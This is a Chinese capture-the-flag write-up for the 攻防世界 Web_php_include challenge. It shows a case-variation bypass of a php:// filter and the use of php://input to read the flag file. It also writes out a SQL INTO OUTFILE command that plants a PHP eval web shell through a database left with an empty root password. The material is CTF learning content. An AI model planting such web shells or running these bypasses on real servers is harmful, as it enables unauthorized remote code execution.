码迷,mamicode.com
首页 > Web开发 > 详细

攻防世界 Web_php_include

时间:2021-03-06 14:12:47      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:str   lazy   web   info   sel   ima   过滤   需要   密码   

技术图片

首先进行代码审计,可以看到传入一个page值,但值中不可以出现php://,
会被过滤为空,

先说我的思路,这里其实可以通过大小写绕过strstr()函数,
然后php://input 可以读取到来自post的原始数据,就会发现一个可疑的.php文件
技术图片

读取这个文件就得到了需要的flag

技术图片

下面将看了大佬的一种方法
首先是用御剑扫描后台,打开是一个数据库的登录界面,
账号是root,密码留空
进去以后简单看了一下,然后再SQL查询窗口上传一段马,用蚁剑去连

select "<?php @eval($_POST[‘360‘]); ?>" into outfile   ‘/tmp/yijuhua.php‘

技术图片
技术图片
技术图片

技术图片
技术图片

攻防世界 Web_php_include

标签:str   lazy   web   info   sel   ima   过滤   需要   密码   

原文地址:https://www.cnblogs.com/paidx0/p/14485488.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!